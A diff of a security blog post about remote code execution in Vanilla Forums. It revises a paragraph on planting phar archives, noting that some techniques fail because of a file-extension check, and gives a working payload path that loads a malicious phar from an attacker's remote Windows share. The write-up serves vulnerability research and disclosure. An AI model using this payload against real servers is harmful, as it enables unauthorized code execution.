sourceincite/sourceincite.github.io/_posts/2018-10-02-old-school-pwning-with-new-school-tricks-vanilla-forums-remote-code-execution.md

 #### Phar planting

-<p class="cn" markdown="1">There are several ways to do this as outlined by Sam such as using a [race condition](https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf) with `phpinfo` in which you can leak the temporary file that is uploaded or using `/proc/self/fd`.
-However, the techniques that I tested and proved working (at least in this specific case) are:</p>
+<p class="cn" markdown="1">Sam states that there are several ways to do this such as using a [race condition](https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf) with `phpinfo` in which you can leak the temporary file that is uploaded or using `/proc/self/fd`.
+However these techniques don't work because there is a check for a file extension.
+The techniques that I tested and proved working (at least in this specific case) are:</p>

 <div markdown="1" class="cn">
 * If targeting a Windows system, just use a remote share! `phar:////attacker/share/test.phar/.jpg`.